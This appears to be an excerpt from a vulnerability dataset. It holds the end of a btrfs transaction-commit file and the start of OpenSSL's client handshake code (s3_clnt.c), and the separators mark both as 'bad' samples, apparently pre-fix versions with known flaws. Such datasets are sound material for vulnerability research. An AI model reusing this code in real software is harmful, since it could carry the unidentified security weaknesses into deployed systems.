btrfs_run_ordered_operations(root, 1);
return 0;
}
/*
* btrfs_transaction state sequence:
* in_commit = 0, blocked = 0 (initial)
* in_commit = 1, blocked = 1
* blocked = 0
* commit_done = 1
*/
int btrfs_commit_transaction(struct btrfs_trans_handle *trans,
struct btrfs_root *root)
{
unsigned long joined = 0;
struct btrfs_transaction *cur_trans = trans->transaction;
struct btrfs_transaction *prev_trans = NULL;
DEFINE_WAIT(wait);
int ret;
int should_grow = 0;
unsigned long now = get_seconds();
ret = btrfs_run_ordered_operations(root, 0);
if (ret) {
btrfs_abort_transaction(trans, root, ret);
goto cleanup_transaction;
}
if (cur_trans->aborted) {
ret = cur_trans->aborted;
goto cleanup_transaction;
}
/* make a pass through all the delayed refs we have so far
* any running procs may add more while we are here
*/
ret = btrfs_run_delayed_refs(trans, root, 0);
if (ret)
goto cleanup_transaction;
btrfs_trans_release_metadata(trans, root);
trans->block_rsv = NULL;
cur_trans = trans->transaction;
/*
* set the flushing flag so procs in this transaction have to
* start sending their work down.
*/
cur_trans->delayed_refs.flushing = 1;
if (!list_empty(&trans->new_bgs))
btrfs_create_pending_block_groups(trans, root);
ret = btrfs_run_delayed_refs(trans, root, 0);
if (ret)
goto cleanup_transaction;
spin_lock(&cur_trans->commit_lock);
if (cur_trans->in_commit) {
spin_unlock(&cur_trans->commit_lock);
atomic_inc(&cur_trans->use_count);
ret = btrfs_end_transaction(trans, root);
wait_for_commit(root, cur_trans);
put_transaction(cur_trans);
return ret;
}
trans->transaction->in_commit = 1;
trans->transaction->blocked = 1;
spin_unlock(&cur_trans->commit_lock);
wake_up(&root->fs_info->transaction_blocked_wait);
spin_lock(&root->fs_info->trans_lock);
if (cur_trans->list.prev != &root->fs_info->trans_list) {
prev_trans = list_entry(cur_trans->list.prev,
struct btrfs_transaction, list);
if (!prev_trans->commit_done) {
atomic_inc(&prev_trans->use_count);
spin_unlock(&root->fs_info->trans_lock);
wait_for_commit(root, prev_trans);
put_transaction(prev_trans);
} else {
spin_unlock(&root->fs_info->trans_lock);
}
} else {
spin_unlock(&root->fs_info->trans_lock);
}
if (!btrfs_test_opt(root, SSD) &&
(now < cur_trans->start_time || now - cur_trans->start_time < 1))
should_grow = 1;
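/*
 * flush pending work and wait here until we are the only writer; when
 * should_grow is set, also give late joiners a brief window to attach
 */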
do {
joined = cur_trans->num_joined;
WARN_ON(cur_trans != trans->transaction);
ret = btrfs_flush_all_pending_stuffs(trans, root);
if (ret)
goto cleanup_transaction;
prepare_to_wait(&cur_trans->writer_wait, &wait,
TASK_UNINTERRUPTIBLE);
if (atomic_read(&cur_trans->num_writers) > 1)
schedule_timeout(MAX_SCHEDULE_TIMEOUT);
else if (should_grow)
schedule_timeout(1);
finish_wait(&cur_trans->writer_wait, &wait);
} while (atomic_read(&cur_trans->num_writers) > 1 ||
(should_grow && cur_trans->num_joined != joined));
ret = btrfs_flush_all_pending_stuffs(trans, root);
if (ret)
goto cleanup_transaction;
/*
* Ok now we need to make sure to block out any other joins while we
* commit the transaction. We could have started a join before setting
* no_join so make sure to wait for num_writers to == 1 again.
*/
spin_lock(&root->fs_info->trans_lock);
root->fs_info->trans_no_join = 1;
spin_unlock(&root->fs_info->trans_lock);
wait_event(cur_trans->writer_wait,
atomic_read(&cur_trans->num_writers) == 1);
/*
* the reloc mutex makes sure that we stop
* the balancing code from coming in and moving
* extents around in the middle of the commit
*/
mutex_lock(&root->fs_info->reloc_mutex);
/*
* We needn't worry about the delayed items because we will
* deal with them in create_pending_snapshot(), which is the
* core function of the snapshot creation.
*/
ret = create_pending_snapshots(trans, root->fs_info);
if (ret) {
mutex_unlock(&root->fs_info->reloc_mutex);
goto cleanup_transaction;
}
/*
* We insert the dir indexes of the snapshots and update the inode
* of the snapshots' parents after the snapshot creation, so there
* are some delayed items which are not dealt with. Now deal with
* them.
*
* We needn't worry that this operation will corrupt the snapshots,
* because all the trees which are snapshotted will be forced to COW
* the nodes and leaves.
*/
ret = btrfs_run_delayed_items(trans, root);
if (ret) {
mutex_unlock(&root->fs_info->reloc_mutex);
goto cleanup_transaction;
}
ret = btrfs_run_delayed_refs(trans, root, (unsigned long)-1);
if (ret) {
mutex_unlock(&root->fs_info->reloc_mutex);
goto cleanup_transaction;
}
/*
* make sure none of the code above managed to slip in a
* delayed item
*/
btrfs_assert_delayed_root_empty(root);
WARN_ON(cur_trans != trans->transaction);
btrfs_scrub_pause(root);
/* btrfs_commit_tree_roots is responsible for getting the
* various roots consistent with each other. Every pointer
* in the tree of tree roots has to point to the most up to date
* root for every subvolume and other tree. So, we have to keep
* the tree logging code from jumping in and changing any
* of the trees.
*
* At this point in the commit, there can't be any tree-log
* writers, but a little lower down we drop the trans mutex
* and let new people in. By holding the tree_log_mutex
* from now until after the super is written, we avoid races
* with the tree-log code.
*/
mutex_lock(&root->fs_info->tree_log_mutex);
ret = commit_fs_roots(trans, root);
if (ret) {
mutex_unlock(&root->fs_info->tree_log_mutex);
mutex_unlock(&root->fs_info->reloc_mutex);
goto cleanup_transaction;
}
/* commit_fs_roots gets rid of all the tree log roots, it is now
* safe to free the root of tree log roots
*/
btrfs_free_log_root_tree(trans, root->fs_info);
ret = commit_cowonly_roots(trans, root);
if (ret) {
mutex_unlock(&root->fs_info->tree_log_mutex);
mutex_unlock(&root->fs_info->reloc_mutex);
goto cleanup_transaction;
}
btrfs_prepare_extent_commit(trans, root);
cur_trans = root->fs_info->running_transaction;
btrfs_set_root_node(&root->fs_info->tree_root->root_item,
root->fs_info->tree_root->node);
switch_commit_root(root->fs_info->tree_root);
btrfs_set_root_node(&root->fs_info->chunk_root->root_item,
root->fs_info->chunk_root->node);
switch_commit_root(root->fs_info->chunk_root);
assert_qgroups_uptodate(trans);
update_super_roots(root);
if (!root->fs_info->log_root_recovering) {
btrfs_set_super_log_root(root->fs_info->super_copy, 0);
btrfs_set_super_log_root_level(root->fs_info->super_copy, 0);
}
memcpy(root->fs_info->super_for_commit, root->fs_info->super_copy,
sizeof(*root->fs_info->super_copy));
trans->transaction->blocked = 0;
spin_lock(&root->fs_info->trans_lock);
root->fs_info->running_transaction = NULL;
root->fs_info->trans_no_join = 0;
spin_unlock(&root->fs_info->trans_lock);
mutex_unlock(&root->fs_info->reloc_mutex);
wake_up(&root->fs_info->transaction_wait);
ret = btrfs_write_and_wait_transaction(trans, root);
if (ret) {
btrfs_error(root->fs_info, ret,
"Error while writing out transaction.");
mutex_unlock(&root->fs_info->tree_log_mutex);
goto cleanup_transaction;
}
ret = write_ctree_super(trans, root, 0);
if (ret) {
mutex_unlock(&root->fs_info->tree_log_mutex);
goto cleanup_transaction;
}
/*
* the super is written, we can safely allow the tree-loggers
* to go about their business
*/
mutex_unlock(&root->fs_info->tree_log_mutex);
btrfs_finish_extent_commit(trans, root);
cur_trans->commit_done = 1;
root->fs_info->last_trans_committed = cur_trans->transid;
wake_up(&cur_trans->commit_wait);
spin_lock(&root->fs_info->trans_lock);
list_del_init(&cur_trans->list);
spin_unlock(&root->fs_info->trans_lock);
put_transaction(cur_trans);
put_transaction(cur_trans);
if (trans->type < TRANS_JOIN_NOLOCK)
sb_end_intwrite(root->fs_info->sb);
trace_btrfs_transaction_commit(root);
btrfs_scrub_continue(root);
if (current->journal_info == trans)
current->journal_info = NULL;
kmem_cache_free(btrfs_trans_handle_cachep, trans);
if (current != root->fs_info->transaction_kthread)
btrfs_run_delayed_iputs(root);
return ret;
cleanup_transaction:
btrfs_trans_release_metadata(trans, root);
trans->block_rsv = NULL;
btrfs_printk(root->fs_info, "Skipping commit of aborted transaction.\n");
// WARN_ON(1);
if (current->journal_info == trans)
current->journal_info = NULL;
cleanup_transaction(trans, root, ret);
return ret;
}
/*
* interface function to delete all the snapshots we have scheduled for deletion
*/
int btrfs_clean_old_snapshots(struct btrfs_root *root)
{
LIST_HEAD(list);
struct btrfs_fs_info *fs_info = root->fs_info;
spin_lock(&fs_info->trans_lock);
list_splice_init(&fs_info->dead_roots, &list);
spin_unlock(&fs_info->trans_lock);
while (!list_empty(&list)) {
int ret;
root = list_entry(list.next, struct btrfs_root, root_list);
list_del(&root->root_list);
btrfs_kill_all_delayed_nodes(root);
if (btrfs_header_backref_rev(root->node) <
BTRFS_MIXED_BACKREF_REV)
ret = btrfs_drop_snapshot(root, NULL, 0, 0);
else
ret = btrfs_drop_snapshot(root, NULL, 1, 0);
BUG_ON(ret < 0);
}
return 0;
}
| ./CrossVul/dataset_final_sorted/CWE-310/c/bad_3783_4 |
crossvul-cpp_data_bad_2152_1 | /* ssl/s3_clnt.c */
/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
* All rights reserved.
*
* This package is an SSL implementation written
* by Eric Young (eay@cryptsoft.com).
* The implementation was written so as to conform with Netscapes SSL.
*
* This library is free for commercial and non-commercial use as long as
* the following conditions are aheared to. The following conditions
* apply to all code found in this distribution, be it the RC4, RSA,
* lhash, DES, etc., code; not just the SSL code. The SSL documentation
* included with this distribution is covered by the same copyright terms
* except that the holder is Tim Hudson (tjh@cryptsoft.com).
*
* Copyright remains Eric Young's, and as such any Copyright notices in
* the code are not to be removed.
* If this package is used in a product, Eric Young should be given attribution
* as the author of the parts of the library used.
* This can be in the form of a textual message at program startup or
* in documentation (online or textual) provided with the package.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
* 1. Redistributions of source code must retain the copyright
* notice, this list of conditions and the following disclaimer.
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* 3. All advertising materials mentioning features or use of this software
* must display the following acknowledgement:
* "This product includes cryptographic software written by
* Eric Young (eay@cryptsoft.com)"
* The word 'cryptographic' can be left out if the rouines from the library
* being used are not cryptographic related :-).
* 4. If you include any Windows specific code (or a derivative thereof) from
* the apps directory (application code) you must include an acknowledgement:
* "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
*
* THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
* ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
* FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
* DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
* OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
* LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
* OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
* SUCH DAMAGE.
*
* The licence and distribution terms for any publically available version or
* derivative of this code cannot be changed. i.e. this code cannot simply be
* copied and put under another distribution licence
* [including the GNU Public Licence.]
*/
/* ====================================================================
* Copyright (c) 1998-2007 The OpenSSL Project. All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions
* are met:
*
* 1. Redistributions of source code must retain the above copyright
* notice, this list of conditions and the following disclaimer.
*
* 2. Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in
* the documentation and/or other materials provided with the
* distribution.
*
* 3. All advertising materials mentioning features or use of this
* software must display the following acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
*
* 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
* endorse or promote products derived from this software without
* prior written permission. For written permission, please contact
* openssl-core@openssl.org.
*
* 5. Products derived from this software may not be called "OpenSSL"
* nor may "OpenSSL" appear in their names without prior written
* permission of the OpenSSL Project.
*
* 6. Redistributions of any form whatsoever must retain the following
* acknowledgment:
* "This product includes software developed by the OpenSSL Project
* for use in the OpenSSL Toolkit (http://www.openssl.org/)"
*
* THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
* EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
* PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR
* ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
* SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
* NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
* LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
* HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
* STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
* OF THE POSSIBILITY OF SUCH DAMAGE.
* ====================================================================
*
* This product includes cryptographic software written by Eric Young
* (eay@cryptsoft.com). This product includes software written by Tim
* Hudson (tjh@cryptsoft.com).
*
*/
/* ====================================================================
* Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED.
*
* Portions of the attached software ("Contribution") are developed by
* SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project.
*
* The Contribution is licensed pursuant to the OpenSSL open source
* license provided above.
*
* ECC cipher suite support in OpenSSL originally written by
* Vipul Gupta and Sumit Gupta of Sun Microsystems Laboratories.
*
*/
/* ====================================================================
* Copyright 2005 Nokia. All rights reserved.
*
* The portions of the attached software ("Contribution") is developed by
* Nokia Corporation and is licensed pursuant to the OpenSSL open source
* license.
*
* The Contribution, originally written by Mika Kousa and Pasi Eronen of
* Nokia Corporation, consists of the "PSK" (Pre-Shared Key) ciphersuites
* support (see RFC 4279) to OpenSSL.
*
* No patent licenses or other rights except those expressly stated in
* the OpenSSL open source license shall be deemed granted or received
* expressly, by implication, estoppel, or otherwise.
*
* No assurances are provided by Nokia that the Contribution does not
* infringe the patent or other intellectual property rights of any third
* party or that the license provides you with all the necessary rights
* to make use of the Contribution.
*
* THE SOFTWARE IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY KIND. IN
* ADDITION TO THE DISCLAIMERS INCLUDED IN THE LICENSE, NOKIA
* SPECIFICALLY DISCLAIMS ANY LIABILITY FOR CLAIMS BROUGHT BY YOU OR ANY
* OTHER ENTITY BASED ON INFRINGEMENT OF INTELLECTUAL PROPERTY RIGHTS OR
* OTHERWISE.
*/
#include <stdio.h>
#include "ssl_locl.h"
#include "kssl_lcl.h"
#include <openssl/buffer.h>
#include <openssl/rand.h>
#include <openssl/objects.h>
#include <openssl/evp.h>
#include <openssl/md5.h>
#ifndef OPENSSL_NO_DH
#include <openssl/dh.h>
#endif
#include <openssl/bn.h>
#ifndef OPENSSL_NO_ENGINE
#include <openssl/engine.h>
#endif
static int ca_dn_cmp(const X509_NAME * const *a,const X509_NAME * const *b);
#ifndef OPENSSL_NO_SSL3_METHOD
static const SSL_METHOD *ssl3_get_client_method(int ver)
{
if (ver == SSL3_VERSION)
return(SSLv3_client_method());
else
return(NULL);
}
IMPLEMENT_ssl3_meth_func(SSLv3_client_method,
ssl_undefined_function,
ssl3_connect,
ssl3_get_client_method)
#endif
int ssl3_connect(SSL *s)
{
BUF_MEM *buf=NULL;
unsigned long Time=(unsigned long)time(NULL);
void (*cb)(const SSL *ssl,int type,int val)=NULL;
int ret= -1;
int new_state,state,skip=0;
RAND_add(&Time,sizeof(Time),0);
ERR_clear_error();
clear_sys_error();
if (s->info_callback != NULL)
cb=s->info_callback;
else if (s->ctx->info_callback != NULL)
cb=s->ctx->info_callback;
s->in_handshake++;
if (!SSL_in_init(s) || SSL_in_before(s)) SSL_clear(s);
#ifndef OPENSSL_NO_HEARTBEATS
/* If we're awaiting a HeartbeatResponse, pretend we
* already got one and don't await it anymore, because
* Heartbeats don't make sense during handshakes anyway.
*/
if (s->tlsext_hb_pending)
{
s->tlsext_hb_pending = 0;
s->tlsext_hb_seq++;
}
#endif
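/* main client-side handshake state machine: loop over s->state until the
 * handshake reaches SSL_ST_OK or an error occurs */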
for (;;)
{
state=s->state;
switch(s->state)
{
case SSL_ST_RENEGOTIATE:
s->renegotiate=1;
s->state=SSL_ST_CONNECT;
s->ctx->stats.sess_connect_renegotiate++;
/* break */
case SSL_ST_BEFORE:
case SSL_ST_CONNECT:
case SSL_ST_BEFORE|SSL_ST_CONNECT:
case SSL_ST_OK|SSL_ST_CONNECT:
s->server=0;
if (cb != NULL) cb(s,SSL_CB_HANDSHAKE_START,1);
if ((s->version & 0xff00 ) != 0x0300)
{
SSLerr(SSL_F_SSL3_CONNECT, ERR_R_INTERNAL_ERROR);
ret = -1;
goto end;
}
if (!ssl_security(s, SSL_SECOP_VERSION, 0,
s->version, NULL))
{
SSLerr(SSL_F_SSL3_CONNECT, SSL_R_VERSION_TOO_LOW);
return -1;
}
/* s->version=SSL3_VERSION; */
s->type=SSL_ST_CONNECT;
if (s->init_buf == NULL)
{
if ((buf=BUF_MEM_new()) == NULL)
{
ret= -1;
goto end;
}
if (!BUF_MEM_grow(buf,SSL3_RT_MAX_PLAIN_LENGTH))
{
ret= -1;
goto end;
}
s->init_buf=buf;
buf=NULL;
}
if (!ssl3_setup_buffers(s)) { ret= -1; goto end; }
/* set up the buffering BIO */
if (!ssl_init_wbio_buffer(s,0)) { ret= -1; goto end; }
/* don't push the buffering BIO quite yet */
ssl3_init_finished_mac(s);
s->state=SSL3_ST_CW_CLNT_HELLO_A;
s->ctx->stats.sess_connect++;
s->init_num=0;
s->s3->flags &= ~SSL3_FLAGS_CCS_OK;
/* Should have been reset by ssl3_get_finished, too. */
s->s3->change_cipher_spec = 0;
break;
case SSL3_ST_CW_CLNT_HELLO_A:
case SSL3_ST_CW_CLNT_HELLO_B:
s->shutdown=0;
ret=ssl3_client_hello(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CR_SRVR_HELLO_A;
s->init_num=0;
/* turn on buffering for the next lot of output */
if (s->bbio != s->wbio)
s->wbio=BIO_push(s->bbio,s->wbio);
break;
case SSL3_ST_CR_SRVR_HELLO_A:
case SSL3_ST_CR_SRVR_HELLO_B:
ret=ssl3_get_server_hello(s);
if (ret <= 0) goto end;
if (s->hit)
{
s->state=SSL3_ST_CR_FINISHED_A;
#ifndef OPENSSL_NO_TLSEXT
if (s->tlsext_ticket_expected)
{
/* receive renewed session ticket */
s->state=SSL3_ST_CR_SESSION_TICKET_A;
}
#endif
}
else
{
s->state=SSL3_ST_CR_CERT_A;
}
s->init_num=0;
break;
case SSL3_ST_CR_CERT_A:
case SSL3_ST_CR_CERT_B:
/* Check if it is anon DH/ECDH, SRP auth */
/* or PSK */
if (!(s->s3->tmp.new_cipher->algorithm_auth & (SSL_aNULL|SSL_aSRP)) &&
!(s->s3->tmp.new_cipher->algorithm_mkey & SSL_kPSK))
{
ret=ssl3_get_server_certificate(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_TLSEXT
if (s->tlsext_status_expected)
s->state=SSL3_ST_CR_CERT_STATUS_A;
else
s->state=SSL3_ST_CR_KEY_EXCH_A;
}
else
{
skip = 1;
s->state=SSL3_ST_CR_KEY_EXCH_A;
}
#else
}
else
skip=1;
s->state=SSL3_ST_CR_KEY_EXCH_A;
#endif
s->init_num=0;
break;
case SSL3_ST_CR_KEY_EXCH_A:
case SSL3_ST_CR_KEY_EXCH_B:
ret=ssl3_get_key_exchange(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CR_CERT_REQ_A;
s->init_num=0;
/* at this point we check that we have the
* required stuff from the server */
if (!ssl3_check_cert_and_algorithm(s))
{
ret= -1;
goto end;
}
break;
case SSL3_ST_CR_CERT_REQ_A:
case SSL3_ST_CR_CERT_REQ_B:
ret=ssl3_get_certificate_request(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CR_SRVR_DONE_A;
s->init_num=0;
break;
case SSL3_ST_CR_SRVR_DONE_A:
case SSL3_ST_CR_SRVR_DONE_B:
ret=ssl3_get_server_done(s);
if (ret <= 0) goto end;
#ifndef OPENSSL_NO_SRP
if (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kSRP)
{
if ((ret = SRP_Calc_A_param(s))<=0)
{
SSLerr(SSL_F_SSL3_CONNECT,SSL_R_SRP_A_CALC);
ssl3_send_alert(s,SSL3_AL_FATAL,SSL_AD_INTERNAL_ERROR);
goto end;
}
}
#endif
if (s->s3->tmp.cert_req)
s->state=SSL3_ST_CW_CERT_A;
else
s->state=SSL3_ST_CW_KEY_EXCH_A;
s->init_num=0;
break;
case SSL3_ST_CW_CERT_A:
case SSL3_ST_CW_CERT_B:
case SSL3_ST_CW_CERT_C:
case SSL3_ST_CW_CERT_D:
ret=ssl3_send_client_certificate(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CW_KEY_EXCH_A;
s->init_num=0;
break;
case SSL3_ST_CW_KEY_EXCH_A:
case SSL3_ST_CW_KEY_EXCH_B:
ret=ssl3_send_client_key_exchange(s);
if (ret <= 0) goto end;
/* EAY EAY EAY need to check for DH fix cert
* sent back */
/* For TLS, cert_req is set to 2, so a cert chain
* of nothing is sent, but no verify packet is sent */
/* XXX: For now, we do not support client
* authentication in ECDH cipher suites with
* ECDH (rather than ECDSA) certificates.
* We need to skip the certificate verify
* message when client's ECDH public key is sent
* inside the client certificate.
*/
if (s->s3->tmp.cert_req == 1)
{
s->state=SSL3_ST_CW_CERT_VRFY_A;
}
else
{
s->state=SSL3_ST_CW_CHANGE_A;
}
if (s->s3->flags & TLS1_FLAGS_SKIP_CERT_VERIFY)
{
s->state=SSL3_ST_CW_CHANGE_A;
}
s->init_num=0;
break;
case SSL3_ST_CW_CERT_VRFY_A:
case SSL3_ST_CW_CERT_VRFY_B:
ret=ssl3_send_client_verify(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CW_CHANGE_A;
s->init_num=0;
break;
case SSL3_ST_CW_CHANGE_A:
case SSL3_ST_CW_CHANGE_B:
ret=ssl3_send_change_cipher_spec(s,
SSL3_ST_CW_CHANGE_A,SSL3_ST_CW_CHANGE_B);
if (ret <= 0) goto end;
#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
s->state=SSL3_ST_CW_FINISHED_A;
#else
if (s->s3->next_proto_neg_seen)
s->state=SSL3_ST_CW_NEXT_PROTO_A;
else
s->state=SSL3_ST_CW_FINISHED_A;
#endif
s->init_num=0;
s->session->cipher=s->s3->tmp.new_cipher;
#ifdef OPENSSL_NO_COMP
s->session->compress_meth=0;
#else
if (s->s3->tmp.new_compression == NULL)
s->session->compress_meth=0;
else
s->session->compress_meth=
s->s3->tmp.new_compression->id;
#endif
if (!s->method->ssl3_enc->setup_key_block(s))
{
ret= -1;
goto end;
}
if (!s->method->ssl3_enc->change_cipher_state(s,
SSL3_CHANGE_CIPHER_CLIENT_WRITE))
{
ret= -1;
goto end;
}
break;
#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
case SSL3_ST_CW_NEXT_PROTO_A:
case SSL3_ST_CW_NEXT_PROTO_B:
ret=ssl3_send_next_proto(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CW_FINISHED_A;
break;
#endif
case SSL3_ST_CW_FINISHED_A:
case SSL3_ST_CW_FINISHED_B:
ret=ssl3_send_finished(s,
SSL3_ST_CW_FINISHED_A,SSL3_ST_CW_FINISHED_B,
s->method->ssl3_enc->client_finished_label,
s->method->ssl3_enc->client_finished_label_len);
if (ret <= 0) goto end;
s->state=SSL3_ST_CW_FLUSH;
/* clear flags */
s->s3->flags&= ~SSL3_FLAGS_POP_BUFFER;
if (s->hit)
{
s->s3->tmp.next_state=SSL_ST_OK;
if (s->s3->flags & SSL3_FLAGS_DELAY_CLIENT_FINISHED)
{
s->state=SSL_ST_OK;
s->s3->flags|=SSL3_FLAGS_POP_BUFFER;
s->s3->delay_buf_pop_ret=0;
}
}
else
{
#ifndef OPENSSL_NO_TLSEXT
/* Allow NewSessionTicket if ticket expected */
if (s->tlsext_ticket_expected)
s->s3->tmp.next_state=SSL3_ST_CR_SESSION_TICKET_A;
else
#endif
s->s3->tmp.next_state=SSL3_ST_CR_FINISHED_A;
}
s->init_num=0;
break;
#ifndef OPENSSL_NO_TLSEXT
case SSL3_ST_CR_SESSION_TICKET_A:
case SSL3_ST_CR_SESSION_TICKET_B:
ret=ssl3_get_new_session_ticket(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CR_FINISHED_A;
s->init_num=0;
break;
case SSL3_ST_CR_CERT_STATUS_A:
case SSL3_ST_CR_CERT_STATUS_B:
ret=ssl3_get_cert_status(s);
if (ret <= 0) goto end;
s->state=SSL3_ST_CR_KEY_EXCH_A;
s->init_num=0;
break;
#endif
case SSL3_ST_CR_FINISHED_A:
case SSL3_ST_CR_FINISHED_B:
s->s3->flags |= SSL3_FLAGS_CCS_OK;
ret=ssl3_get_finished(s,SSL3_ST_CR_FINISHED_A,
SSL3_ST_CR_FINISHED_B);
if (ret <= 0) goto end;
if (s->hit)
s->state=SSL3_ST_CW_CHANGE_A;
else
s->state=SSL_ST_OK;
s->init_num=0;
break;
case SSL3_ST_CW_FLUSH:
s->rwstate=SSL_WRITING;
if (BIO_flush(s->wbio) <= 0)
{
ret= -1;
goto end;
}
s->rwstate=SSL_NOTHING;
s->state=s->s3->tmp.next_state;
break;
case SSL_ST_OK:
/* clean a few things up */
ssl3_cleanup_key_block(s);
if (s->init_buf != NULL)
{
BUF_MEM_free(s->init_buf);
s->init_buf=NULL;
}
/* If we are not 'joining' the last two packets,
* remove the buffering now */
if (!(s->s3->flags & SSL3_FLAGS_POP_BUFFER))
ssl_free_wbio_buffer(s);
/* else do it later in ssl3_write */
s->init_num=0;
s->renegotiate=0;
s->new_session=0;
ssl_update_cache(s,SSL_SESS_CACHE_CLIENT);
if (s->hit) s->ctx->stats.sess_hit++;
ret=1;
/* s->server=0; */
s->handshake_func=ssl3_connect;
s->ctx->stats.sess_connect_good++;
if (cb != NULL) cb(s,SSL_CB_HANDSHAKE_DONE,1);
goto end;
/* break; */
default:
SSLerr(SSL_F_SSL3_CONNECT,SSL_R_UNKNOWN_STATE);
ret= -1;
goto end;
/* break; */
}
/* did we do anything */
if (!s->s3->tmp.reuse_message && !skip)
{
if (s->debug)
{
if ((ret=BIO_flush(s->wbio)) <= 0)
goto end;
}
if ((cb != NULL) && (s->state != state))
{
new_state=s->state;
s->state=state;
cb(s,SSL_CB_CONNECT_LOOP,1);
s->state=new_state;
}
}
skip=0;
}
end:
s->in_handshake--;
if (buf != NULL)
BUF_MEM_free(buf);
if (cb != NULL)
cb(s,SSL_CB_CONNECT_EXIT,ret);
return(ret);
}
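/*
 * construct and send the ClientHello: client_version, client_random,
 * session id, optional DTLS cookie, cipher list, compression methods and
 * TLS extensions
 */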
int ssl3_client_hello(SSL *s)
{
unsigned char *buf;
unsigned char *p,*d;
int i;
unsigned long l;
int al = 0;
#ifndef OPENSSL_NO_COMP
int j;
SSL_COMP *comp;
#endif
buf=(unsigned char *)s->init_buf->data;
if (s->state == SSL3_ST_CW_CLNT_HELLO_A)
{
SSL_SESSION *sess = s->session;
if ((sess == NULL) ||
(sess->ssl_version != s->version) ||
!sess->session_id_length ||
(sess->not_resumable))
{
if (!ssl_get_new_session(s,0))
goto err;
}
if (s->method->version == DTLS_ANY_VERSION)
{
/* Determine which DTLS version to use */
int options = s->options;
/* If DTLS 1.2 is disabled, correct the version number */
if (options & SSL_OP_NO_DTLSv1_2)
{
if (tls1_suiteb(s))
{
SSLerr(SSL_F_SSL3_CLIENT_HELLO, SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE);
goto err;
}
/* Disabling all versions is silly: return an
* error.
*/
if (options & SSL_OP_NO_DTLSv1)
{
SSLerr(SSL_F_SSL3_CLIENT_HELLO,SSL_R_WRONG_SSL_VERSION);
goto err;
}
/* Update method so we don't use any DTLS 1.2
* features.
*/
s->method = DTLSv1_client_method();
s->version = DTLS1_VERSION;
}
else
{
/* We only support one version: update method */
if (options & SSL_OP_NO_DTLSv1)
s->method = DTLSv1_2_client_method();
s->version = DTLS1_2_VERSION;
}
s->client_version = s->version;
}
/* else use the pre-loaded session */
p=s->s3->client_random;
/* for DTLS, if client_random is already initialized, reuse it; we are
* required to use the same one upon reply to HelloVerify */
if (SSL_IS_DTLS(s))
{
size_t idx;
i = 1;
for (idx=0; idx < sizeof(s->s3->client_random); idx++)
{
if (p[idx])
{
i = 0;
break;
}
}
}
else
i = 1;
if (i)
ssl_fill_hello_random(s, 0, p,
sizeof(s->s3->client_random));
/* Do the message type and length last */
d=p= ssl_handshake_start(s);
/*-
* version indicates the negotiated version (for example from
* an SSLv2/v3 compatible client hello). The client_version
* field is the maximum version we permit and it is also
* used in RSA encrypted premaster secrets. Some servers can
* choke if we initially report a higher version then
* renegotiate to a lower one in the premaster secret. This
* didn't happen with TLS 1.0 as most servers supported it
* but it can with TLS 1.1 or later if the server only supports
* 1.0.
*
* Possible scenario with previous logic:
* 1. Client hello indicates TLS 1.2
* 2. Server hello says TLS 1.0
* 3. RSA encrypted premaster secret uses 1.2.
* 4. Handshake proceeds using TLS 1.0.
* 5. Server sends hello request to renegotiate.
* 6. Client hello indicates TLS v1.0 as we now
* know that is maximum server supports.
